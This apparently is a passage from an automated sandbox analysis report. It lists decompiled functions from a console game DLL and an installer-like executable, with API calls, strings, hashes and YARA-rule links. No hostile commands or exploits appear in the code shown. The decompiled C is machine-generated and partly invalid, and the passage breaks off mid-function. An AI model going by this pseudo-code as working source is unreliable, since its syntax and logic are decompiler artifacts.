                                                                                • Instruction ID: c9eade559dcb8dabe12f7fb8fefc2ecb3bb817c4e851fb83d30c8e131ed4808d
                                                                                • Opcode Fuzzy Hash: 6cc92331e1a84e00b86faf76b0da97472e428bf09019f1db0eb92137fff79902
                                                                                • Instruction Fuzzy Hash: B5F01DB2E04105BFD700EFA4EE89DAFB7BDEB44345B104576F602F2190C6789D018B69
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 10001710, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 100COMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 51%
                                                                                			E10001710(void* __eflags) {
				signed int _v8;
				void* _t15;
				signed int _t16;
				signed int _t19;
				signed int _t22;
				signed int _t32;
				signed int _t52;
				signed int _t53;
				signed int _t56;
				signed int* _t68;
				signed int _t69;
				signed int _t70;
				void* _t71;
				signed int _t72;
				void* _t77;
				void* _t78;

				_t15 = E100014C0( *0x10002018);
				_t78 = _t77 + 4;
				if(_t15 == 0) {
					_t16 = E100014C0( *0x1000201c);
					_t78 = _t78 + 4;
					__eflags = _t16;
					if(_t16 == 0) {
						_t16 = E10001260();
						__eflags = _t16;
						if(_t16 == 0) {
							__eflags =  *0x10004004 - 2;
							if( *0x10004004 != 2) {
								__eflags =  *0x1000400c - 2;
								if( *0x1000400c != 2) {
									__eflags =  *0x1000401c - 2;
									if( *0x1000401c != 2) {
										__eflags =  *0x10004024 - 2;
										_t68 =  !=  ? E10004000 : 0x10004024;
									} else {
										_t68 = 0x1000401c;
									}
								} else {
									_t68 = 0x1000400c;
								}
							} else {
								_t68 = 0x10004004;
							}
							_t52 =  *0x10004028; // 0x1
							_t19 = _t52 & 0x80000001;
							__eflags = _t19;
							if(_t19 < 0) {
								_t19 = (_t19 - 0x00000001 | 0xfffffffe) + 1;
								__eflags = _t19;
							}
							asm("sbb eax, eax");
							_t22 = ( ~_t19 & 0xfffffffe) + 5;
							__eflags = _t22;
							 *_t68 = _t22;
							_t14 = _t52 + 1; // 0x2
							_t69 = _t14;
							goto L30;
						}
						_t70 =  *0x10004028; // 0x1
						_t56 = _t70 & 0x80000001;
						__eflags = _t56;
						if(_t56 < 0) {
							_t56 = (_t56 - 0x00000001 | 0xfffffffe) + 1;
							__eflags = _t56;
						}
						L19:
						asm("sbb ecx, ecx");
						_t52 = ( ~_t56 & 0xfffffffe) + 5;
						_t69 = _t70 + 1;
						 *(_t16 * 4 + E10004000) = _t52;
						goto L30;
					}
					_t70 =  *0x10004028; // 0x1
					_t56 = _t70 & 0x80000001;
					__eflags = _t56;
					if(_t56 >= 0) {
						goto L19;
					}
					asm("sbb ecx, ecx");
					_t52 = ( ~((_t56 - 0x00000001 | 0xfffffffe) + 1) & 0xfffffffe) + 5;
					_t69 = _t70 + 1;
					 *(_t16 * 4 + E10004000) = _t52;
					goto L30;
				} else {
					__edx =  *0x10004028; // 0x1
					__ecx = __edx;
					__ecx = __edx & 0x80000001;
					__eflags = __ecx;
					if(__ecx < 0) {
						__ecx = __ecx - 1;
						__ecx = __ecx | 0xfffffffe;
						__ecx = __ecx + 1;
						__eflags = __ecx;
					}
					__ecx =  ~__ecx;
					asm("sbb ecx, ecx");
					__ecx = __ecx & 0xfffffffe;
					__ecx = __ecx + 5;
					__edx = __edx + 1;
					 *(__eax * 4 + E10004000) = __ecx;
					 *0x10002000 = 1;
					L30:
					 *0x10004028 = _t69;
					E10001100();
					__eflags =  *0x10002000;
					if( *0x10002000 == 0) {
						_push(_t52);
						if( *0x10004028 > 9) {
							E10001210(0x1e, 0x14);
							E10001620();
							_t78 = _t78 + 0xc;
							__imp___getch("Game Draw");
							exit(0);
						}
						E10001100();
						0x10002004->X = 0x12001e;
						SetConsoleCursorPosition(GetStdHandle(0xfffffff5), 0x10002004->X);
						E10001620("Your Turn :> ", _t71);
						E100016E0("%d",  &_v8);
						_t72 = _v8;
						if( *((intOrPtr*)(_t72 * 4 + E10004000)) != 2) {
							L1();
							_t72 = _v8;
						}
						if(_t72 == E100014C0( *0x1000201c)) {
							E100011D0(_t72);
							E10001100();
							E10001210(0x1e, 0x14);
							E10001620();
							__imp___getch("Player Wins");
							exit(0);
						}
						_t53 =  *0x10004028; // 0x1
						_t32 = _t53 & 0x80000001;
						if(_t32 < 0) {
							_t32 = (_t32 - 0x00000001 | 0xfffffffe) + 1;
						}
						asm("sbb eax, eax");
						 *((intOrPtr*)(_t72 * 4 + E10004000)) = ( ~_t32 & 0xfffffffe) + 5;
						 *0x10004028 = _t53 + 1;
						E10001100();
						return E10001710(( ~_t32 & 0xfffffffe) + 5);
					}
					0x10002004->X = 0x14001e;
					SetConsoleCursorPosition(GetStdHandle(0xfffffff5),  *0x10002004);
					E10001620();
					return __imp___getch("Computer wins");
				}
			}



















                                                                                0x10001716
                                                                                0x1000171b
                                                                                0x10001720
                                                                                0x1000175e
                                                                                0x10001763
                                                                                0x10001766
                                                                                0x10001768
                                                                                0x10001796
                                                                                0x1000179b
                                                                                0x1000179d
                                                                                0x100017c8
                                                                                0x100017cf
                                                                                0x100017d8
                                                                                0x100017df
                                                                                0x100017e8
                                                                                0x100017ef
                                                                                0x100017f8
                                                                                0x10001809
                                                                                0x100017f1
                                                                                0x100017f1
                                                                                0x100017f1
                                                                                0x100017e1
                                                                                0x100017e1
                                                                                0x100017e1
                                                                                0x100017d1
                                                                                0x100017d1
                                                                                0x100017d1
                                                                                0x1000180c
                                                                                0x10001814
                                                                                0x10001814
                                                                                0x10001819
                                                                                0x1000181f
                                                                                0x1000181f
                                                                                0x1000181f
                                                                                0x10001822
                                                                                0x10001827
                                                                                0x10001827
                                                                                0x1000182a
                                                                                0x1000182c
                                                                                0x1000182c
                                                                                0x00000000
                                                                                0x1000182c
                                                                                0x1000179f
                                                                                0x100017a7
                                                                                0x100017a7
                                                                                0x100017ad
                                                                                0x100017b3
                                                                                0x100017b3
                                                                                0x100017b3
                                                                                0x100017b4
                                                                                0x100017b6
                                                                                0x100017bb
                                                                                0x100017be
                                                                                0x100017bf
                                                                                0x00000000
                                                                                0x100017bf
                                                                                0x1000176a
                                                                                0x10001772
                                                                                0x10001772
                                                                                0x10001778
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x10001781
                                                                                0x10001786
                                                                                0x10001789
                                                                                0x1000178a
                                                                                0x00000000
                                                                                0x10001722
                                                                                0x10001722
                                                                                0x10001728
                                                                                0x1000172a
                                                                                0x1000172a
                                                                                0x10001730
                                                                                0x10001732
                                                                                0x10001733
                                                                                0x10001736
                                                                                0x10001736
                                                                                0x10001736
                                                                                0x10001737
                                                                                0x10001739
                                                                                0x1000173b
                                                                                0x1000173e
                                                                                0x10001741
                                                                                0x10001742
                                                                                0x10001749
                                                                                0x1000182f
                                                                                0x1000182f
                                                                                0x10001835
                                                                                0x1000183a
                                                                                0x10001841
                                                                                0x100013b3
                                                                                0x100013bb
                                                                                0x100013c1
                                                                                0x100013cb
                                                                                0x100013d0
                                                                                0x100013d3
                                                                                0x100013db
                                                                                0x100013db
                                                                                0x100013e2
                                                                                0x100013e7
                                                                                0x10001400
                                                                                0x1000140b
                                                                                0x10001419
                                                                                0x1000141e
                                                                                0x1000142c
                                                                                0x1000142e
                                                                                0x10001433
                                                                                0x10001433
                                                                                0x10001446
                                                                                0x10001449
                                                                                0x1000144e
                                                                                0x10001457
                                                                                0x10001461
                                                                                0x10001469
                                                                                0x10001471
                                                                                0x10001471
                                                                                0x10001477
                                                                                0x1000147f
                                                                                0x10001484
                                                                                0x1000148a
                                                                                0x1000148a
                                                                                0x1000148d
                                                                                0x10001496
                                                                                0x1000149d
                                                                                0x100014a3
                                                                                0x100014b1
                                                                                0x100014b1
                                                                                0x10001843
                                                                                0x1000185c
                                                                                0x10001867
                                                                                0x1000186f
                                                                                0x1000186f

                                                                                APIs
                                                                                • GetStdHandle.KERNEL32(000000F5,?,?,?,?,?,100013A5), ref: 10001855
                                                                                • SetConsoleCursorPosition.KERNEL32(00000000,?,?,?,?,?,100013A5), ref: 1000185C
                                                                                • _printf.MSPDB140-MSVCRT ref: 10001867
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.235794772.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                • Associated: 00000000.00000002.235775448.0000000010000000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.235800984.0000000010003000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.235807350.0000000010004000.00000040.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.235820043.0000000010006000.00000002.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: ConsoleCursorHandlePosition_printf
                                                                                • String ID: Computer wins
                                                                                • API String ID: 1663292651-2011947360
                                                                                • Opcode ID: d28a0be20067ca4fd51d19516bc2ffc16c11c58fcf58fc95b6a74be35daecc5e
                                                                                • Instruction ID: 7aae5e044a2f6b8216d7cbcf7dc276563d11b6ca5496d447282ce552f5be5a33
                                                                                • Opcode Fuzzy Hash: d28a0be20067ca4fd51d19516bc2ffc16c11c58fcf58fc95b6a74be35daecc5e
                                                                                • Instruction Fuzzy Hash: CD31C0B551861086F318CB34CD913DA32E2E7453E5B26832CEB27922FDDF398485CB09
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00404568, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 78stringCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 51%
                                                                                			E00404568(int _a4, intOrPtr _a8, unsigned int _a12) {
				char _v36;
				char _v68;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t26;
				void* _t34;
				signed int _t36;
				signed int _t39;
				unsigned int _t46;

				_t46 = _a12;
				_push(0x14);
				_pop(0);
				_t34 = 0xffffffdc;
				if(_t46 < 0x100000) {
					_push(0xa);
					_pop(0);
					_t34 = 0xffffffdd;
				}
				if(_t46 < 0x400) {
					_t34 = 0xffffffde;
				}
				if(_t46 < 0xffff3333) {
					_t39 = 0x14;
					asm("cdq");
					_t46 = _t46 + 1 / _t39;
				}
				_push(E004059FF(_t34, 0, _t46,  &_v36, 0xffffffdf));
				_push(E004059FF(_t34, 0, _t46,  &_v68, _t34));
				_t21 = _t46 & 0x00ffffff;
				_t36 = 0xa;
				_push(((_t46 & 0x00ffffff) + _t21 * 4 + (_t46 & 0x00ffffff) + _t21 * 4 >> 0) % _t36);
				_push(_t46 >> 0);
				_t26 = E004059FF(_t34, 0, 0x420478, 0x420478, _a8);
				wsprintfA(_t26 + lstrlenA(0x420478), "%u.%u%s%s");
				return SetDlgItemTextA( *0x423658, _a4, 0x420478);
			}













                                                                                0x00404570
                                                                                0x00404574
                                                                                0x0040457c
                                                                                0x0040457f
                                                                                0x00404580
                                                                                0x00404582
                                                                                0x00404584
                                                                                0x00404587
                                                                                0x00404587
                                                                                0x0040458e
                                                                                0x00404594
                                                                                0x00404594
                                                                                0x0040459b
                                                                                0x004045a6
                                                                                0x004045a7
                                                                                0x004045aa
                                                                                0x004045aa
                                                                                0x004045b7
                                                                                0x004045c2
                                                                                0x004045c5
                                                                                0x004045d7
                                                                                0x004045de
                                                                                0x004045df
                                                                                0x004045ee
                                                                                0x004045fe
                                                                                0x0040461a

                                                                                APIs
                                                                                • lstrlenA.KERNEL32(00420478,00420478,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,00404488,000000DF,0000040F,00000400,00000000), ref: 004045F6
                                                                                • wsprintfA.USER32 ref: 004045FE
                                                                                • SetDlgItemTextA.USER32 ref: 00404611
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.232381303.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.232365938.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.232391183.0000000000407000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.232396290.0000000000409000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.232409652.0000000000417000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.232414737.0000000000422000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.232423171.0000000000429000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.232429022.000000000042C000.00000002.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: ItemTextlstrlenwsprintf
                                                                                • String ID: %u.%u%s%s
                                                                                • API String ID: 3540041739-3551169577
                                                                                • Opcode ID: 1fe6c35c0a5c12af0758eda6fcd91f800dae708434e3b464b1985a7a483ce98e
                                                                                • Instruction ID: de100ae33fd703a766e80fabf1c0ef7e237f6bef08e04a4196497c65211e5d03
                                                                                • Opcode Fuzzy Hash: 1fe6c35c0a5c12af0758eda6fcd91f800dae708434e3b464b1985a7a483ce98e
                                                                                • Instruction Fuzzy Hash: 331104B370012477DB10666D9C05EAF329DDBC6334F14023BFA2AF61D1E9388C1186E8
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00401BAD, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 76windowtimeCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 51%
                                                                                			E00401BAD() {
				signed int _t28;
				CHAR* _t31;
				long _t32;
				int _t37;
				signed int _t38;
				int _t42;
				int _t48;
				struct HWND__* _t52;
				void* _t55;

				 *(_t55 - 0x34) = E004029D9(3);
				 *(_t55 + 8) = E004029D9(4);
				if(( *(_t55 - 0x10) & 0x00000001) != 0) {
					 *((intOrPtr*)(__ebp - 0x34)) = E004029F6(0x33);
				}
				__eflags =  *(_t55 - 0x10) & 0x00000002;
				if(( *(_t55 - 0x10) & 0x00000002) != 0) {
					 *(_t55 + 8) = E004029F6(0x44);
				}
				__eflags =  *((intOrPtr*)(_t55 - 0x28)) - 0x21;
				_push(1);
				if(__eflags != 0) {
					_t50 = E004029F6();
					_t28 = E004029F6();
					asm("sbb ecx, ecx");
					asm("sbb eax, eax");
					_t31 =  ~( *_t27) & _t50;
					__eflags = _t31;
					_t32 = FindWindowExA( *(_t55 - 0x34),  *(_t55 + 8), _t31,  ~( *_t28) & _t28);
					goto L10;
				} else {
					_t52 = E004029D9();
					_t37 = E004029D9();
					_t48 =  *(_t55 - 0x10) >> 2;
					if(__eflags == 0) {
						_t32 = SendMessageA(_t52, _t37,  *(_t55 - 0x34),  *(_t55 + 8));
						L10:
						 *(_t55 - 8) = _t32;
					} else {
						_t38 = SendMessageTimeoutA(_t52, _t37,  *(_t55 - 0x34),  *(_t55 + 8), _t42, _t48, _t55 - 8);
						asm("sbb eax, eax");
						 *((intOrPtr*)(_t55 - 4)) =  ~_t38 + 1;
					}
				}
				__eflags =  *((intOrPtr*)(_t55 - 0x24)) - _t42;
				if( *((intOrPtr*)(_t55 - 0x24)) >= _t42) {
					_push( *(_t55 - 8));
					E0040593B();
				}
				 *0x423f08 =  *0x423f08 +  *((intOrPtr*)(_t55 - 4));
				return 0;
			}












                                                                                0x00401bb6
                                                                                0x00401bc2
                                                                                0x00401bc5
                                                                                0x00401bce
                                                                                0x00401bce
                                                                                0x00401bd1
                                                                                0x00401bd5
                                                                                0x00401bde
                                                                                0x00401bde
                                                                                0x00401be1
                                                                                0x00401be5
                                                                                0x00401be7
                                                                                0x00401c34
                                                                                0x00401c36
                                                                                0x00401c3f
                                                                                0x00401c47
                                                                                0x00401c4a
                                                                                0x00401c4a
                                                                                0x00401c53
                                                                                0x00000000
                                                                                0x00401be9
                                                                                0x00401bf0
                                                                                0x00401bf2
                                                                                0x00401bfa
                                                                                0x00401bfd
                                                                                0x00401c25
                                                                                0x00401c59
                                                                                0x00401c59
                                                                                0x00401bff
                                                                                0x00401c0d
                                                                                0x00401c15
                                                                                0x00401c18
                                                                                0x00401c18
                                                                                0x00401bfd
                                                                                0x00401c5c
                                                                                0x00401c5f
                                                                                0x00401c65
                                                                                0x00402833
                                                                                0x00402833
                                                                                0x0040288e
                                                                                0x0040289a

                                                                                APIs
                                                                                • SendMessageTimeoutA.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C0D
                                                                                • SendMessageA.USER32 ref: 00401C25
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.232381303.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.232365938.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.232391183.0000000000407000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.232396290.0000000000409000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.232409652.0000000000417000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.232414737.0000000000422000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.232423171.0000000000429000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.232429022.000000000042C000.00000002.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: MessageSend$Timeout
                                                                                • String ID: !
                                                                                • API String ID: 1777923405-2657877971
                                                                                • Opcode ID: a21e9fedaf10b3d0faf8ff8eb7872d1ba6ab3a41dfe2fcd52b90142743086bd6
                                                                                • Instruction ID: 089b6e11c3ee5c2ceb15467343933f82bc3488a694e04e66c57418204d538f9a
                                                                                • Opcode Fuzzy Hash: a21e9fedaf10b3d0faf8ff8eb7872d1ba6ab3a41dfe2fcd52b90142743086bd6
                                                                                • Instruction Fuzzy Hash: B321C4B1A44209BFEF01AFB4CE4AAAE7B75EF40344F14053EF602B60D1D6B84980E718
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0040523D, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 24processCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 100%
                                                                                			E0040523D(CHAR* _a4) {
				struct _PROCESS_INFORMATION _v20;
				int _t7;

				0x422480->cb = 0x44;
				_t7 = CreateProcessA(0, _a4, 0, 0, 0, 0, 0, 0, 0x422480,  &_v20);
				if(_t7 != 0) {
					CloseHandle(_v20.hThread);
					return _v20.hProcess;
				}
				return _t7;
			}





                                                                                0x00405246
                                                                                0x00405262
                                                                                0x0040526a
                                                                                0x0040526f
                                                                                0x00000000
                                                                                0x00405275
                                                                                0x00405279

                                                                                APIs
                                                                                Strings
                                                                                • C:\Users\user\AppData\Local\Temp\, xrefs: 0040523D
                                                                                • Error launching installer, xrefs: 00405250
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.232381303.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.232365938.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.232391183.0000000000407000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.232396290.0000000000409000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.232409652.0000000000417000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.232414737.0000000000422000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.232423171.0000000000429000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.232429022.000000000042C000.00000002.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: CloseCreateHandleProcess
                                                                                • String ID: C:\Users\user\AppData\Local\Temp\$Error launching installer
                                                                                • API String ID: 3712363035-7751565
                                                                                • Opcode ID: 1f2f9ff3088062fdf2c67fe66ccdb0f341c5896b9e6aafa6ba1adbb34377fffc
                                                                                • Instruction ID: 0a3d69d2a3401d9d63374a1600280413a6fd3692a6ba6d2da32d4f839eaa01ec
                                                                                • Opcode Fuzzy Hash: 1f2f9ff3088062fdf2c67fe66ccdb0f341c5896b9e6aafa6ba1adbb34377fffc
                                                                                • Instruction Fuzzy Hash: BEE0E674A1010ABBDB00EF64DD09D6B7B7CFB00304B408621E911E2150D774E4108A79
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 004054D0, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16stringCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 100%
                                                                                			E004054D0(CHAR* _a4) {
				CHAR* _t7;

				_t7 = _a4;
				if( *(CharPrevA(_t7,  &(_t7[lstrlenA(_t7)]))) != 0x5c) {
					lstrcatA(_t7, 0x409010);
				}
				return _t7;
			}




                                                                                0x004054d1
                                                                                0x004054e8
                                                                                0x004054f0
                                                                                0x004054f0
                                                                                0x004054f8

                                                                                APIs
                                                                                • lstrlenA.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,004030B5,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403215), ref: 004054D6
                                                                                • CharPrevA.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,004030B5,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403215), ref: 004054DF
                                                                                • lstrcatA.KERNEL32(?,00409010), ref: 004054F0
                                                                                Strings
                                                                                • C:\Users\user\AppData\Local\Temp\, xrefs: 004054D0
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.232381303.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.232365938.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.232391183.0000000000407000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.232396290.0000000000409000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.232409652.0000000000417000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.232414737.0000000000422000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.232423171.0000000000429000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.232429022.000000000042C000.00000002.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: CharPrevlstrcatlstrlen
                                                                                • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                • API String ID: 2659869361-823278215
                                                                                • Opcode ID: f17b2ccdaa8efd10834e0f4341d4d5b977b2bb6e8559feba5c8cad9ccc1df0ef
                                                                                • Instruction ID: 18d73bba3a4f2c077241afd2b81ba446c35da1b9bd2d8ef2eba9fb39a34af30a
                                                                                • Opcode Fuzzy Hash: f17b2ccdaa8efd10834e0f4341d4d5b977b2bb6e8559feba5c8cad9ccc1df0ef
                                                                                • Instruction Fuzzy Hash: 09D0A7B2505970AED20126195C05FCF2A08CF023117044423F640B21D2C63C5C819BFD
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 100010D1, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 12COMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 18%
                                                                                			E100010D1(void* __eax, signed int __edi, void* __esi) {
				void* _t5;

				 *(__esi + 0x24) =  *(__esi + 0x24) | __edi;
				E10001210(0x1e, 0x14);
				_t5 = E10001620();
				__imp___getch("Game Draw");
				exit(0);
				return _t5;
			}




                                                                                0x100010d6
                                                                                0x100010dd
                                                                                0x100010e7
                                                                                0x100010ef
                                                                                0x100010f7
                                                                                0x100010fd

                                                                                APIs
                                                                                  • Part of subcall function 10001210: GetStdHandle.KERNEL32(000000F5), ref: 1000122F
                                                                                  • Part of subcall function 10001210: SetConsoleCursorPosition.KERNEL32(00000000), ref: 10001236
                                                                                • _printf.MSPDB140-MSVCRT ref: 100010E7
                                                                                • _getch.MSVCRT ref: 100010EF
                                                                                • exit.MSVCRT ref: 100010F7
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.235794772.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                • Associated: 00000000.00000002.235775448.0000000010000000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.235800984.0000000010003000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.235807350.0000000010004000.00000040.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.235820043.0000000010006000.00000002.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: ConsoleCursorHandlePosition_getch_printfexit
                                                                                • String ID: Game Draw
                                                                                • API String ID: 2945803984-3265694624
                                                                                • Opcode ID: 7ea2d7015e9e2a22d263004f3c11b0328e7da85b8610b783033d7fc56f01a643
                                                                                • Instruction ID: e3bbca9443e769f70689c56ed90f775a67b65ddcbad5693027ac6412051f25ce
                                                                                • Opcode Fuzzy Hash: 7ea2d7015e9e2a22d263004f3c11b0328e7da85b8610b783033d7fc56f01a643
                                                                                • Instruction Fuzzy Hash: 89D0127594124076FA10F7A04E8FB9E3B64DB447C2F044504F306A40DEC9A151108737
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00401EC5, Relevance: 6.1, APIs: 4, Instructions: 54memoryCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 85%
                                                                                			E00401EC5(char __ebx, char* __edi, char* __esi) {
				char* _t18;
				int _t19;
				void* _t30;

				_t18 = E004029F6(0xffffffee);
				 *(_t30 - 0x2c) = _t18;
				_t19 = GetFileVersionInfoSizeA(_t18, _t30 - 0x30);
				 *__esi = __ebx;
				 *(_t30 - 8) = _t19;
				 *__edi = __ebx;
				 *((intOrPtr*)(_t30 - 4)) = 1;
				if(_t19 != __ebx) {
					__eax = GlobalAlloc(0x40, __eax);
					 *(__ebp + 8) = __eax;
					if(__eax != __ebx) {
						if(__eax != 0) {
							__ebp - 0x44 = __ebp - 0x34;
							if(VerQueryValueA( *(__ebp + 8), 0x409010, __ebp - 0x34, __ebp - 0x44) != 0) {
								 *(__ebp - 0x34) = E0040593B(__esi,  *((intOrPtr*)( *(__ebp - 0x34) + 8)));
								 *(__ebp - 0x34) = E0040593B(__edi,  *((intOrPtr*)( *(__ebp - 0x34) + 0xc)));
								 *((intOrPtr*)(__ebp - 4)) = __ebx;
							}
						}
						_push( *(__ebp + 8));
						GlobalFree();
					}
				}
				 *0x423f08 =  *0x423f08 +  *((intOrPtr*)(_t30 - 4));
				return 0;
			}






                                                                                0x00401ec7
                                                                                0x00401ecf
                                                                                0x00401ed4
                                                                                0x00401ed9
                                                                                0x00401edd
                                                                                0x00401ee0
                                                                                0x00401ee2
                                                                                0x00401ee9
                                                                                0x00401ef2
                                                                                0x00401efa
                                                                                0x00401efd
                                                                                0x00401f12
                                                                                0x00401f18
                                                                                0x00401f2b
                                                                                0x00401f34
                                                                                0x00401f40
                                                                                0x00401f45
                                                                                0x00401f45
                                                                                0x00401f2b
                                                                                0x00401f48
                                                                                0x00401b75
                                                                                0x00401b75
                                                                                0x00401efd
                                                                                0x0040288e
                                                                                0x0040289a

                                                                                APIs
                                                                                • GetFileVersionInfoSizeA.VERSION(00000000,?,000000EE), ref: 00401ED4
                                                                                • GlobalAlloc.KERNEL32(00000040,00000000,00000000,?,000000EE), ref: 00401EF2
                                                                                • GetFileVersionInfoA.VERSION(?,?,?,00000000), ref: 00401F0B
                                                                                • VerQueryValueA.VERSION(?,00409010,?,?,?,?,?,00000000), ref: 00401F24
                                                                                  • Part of subcall function 0040593B: wsprintfA.USER32 ref: 00405948
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.232381303.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.232365938.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.232391183.0000000000407000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.232396290.0000000000409000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.232409652.0000000000417000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.232414737.0000000000422000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.232423171.0000000000429000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.232429022.000000000042C000.00000002.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: FileInfoVersion$AllocGlobalQuerySizeValuewsprintf
                                                                                • String ID:
                                                                                • API String ID: 1404258612-0
                                                                                • Opcode ID: 5ad4029777412aa04d550861e2bed0e69e3ebf36d35441644269c78ecf03c7c9
                                                                                • Instruction ID: c89dd17dca05a4943d3391fb2cd1692a09cb541ea82e56f2b02e2e037c4b4a4a
                                                                                • Opcode Fuzzy Hash: 5ad4029777412aa04d550861e2bed0e69e3ebf36d35441644269c78ecf03c7c9
                                                                                • Instruction Fuzzy Hash: E2115AB2901108BFDB01EFA5D981DAEBBB9EF04354B20803AF501F61E1D7389E55DB28
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00401D1B, Relevance: 6.0, APIs: 4, Instructions: 34COMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 67%
                                                                                			E00401D1B() {
				void* __esi;
				int _t6;
				signed char _t11;
				struct HFONT__* _t14;
				void* _t18;
				void* _t24;
				void* _t26;
				void* _t28;

				_t6 = GetDeviceCaps(GetDC( *(_t28 - 0x34)), 0x5a);
				0x40af54->lfHeight =  ~(MulDiv(E004029D9(2), _t6, 0x48));
				 *0x40af64 = E004029D9(3);
				_t11 =  *((intOrPtr*)(_t28 - 0x14));
				 *0x40af6b = 1;
				 *0x40af68 = _t11 & 0x00000001;
				 *0x40af69 = _t11 & 0x00000002;
				 *0x40af6a = _t11 & 0x00000004;
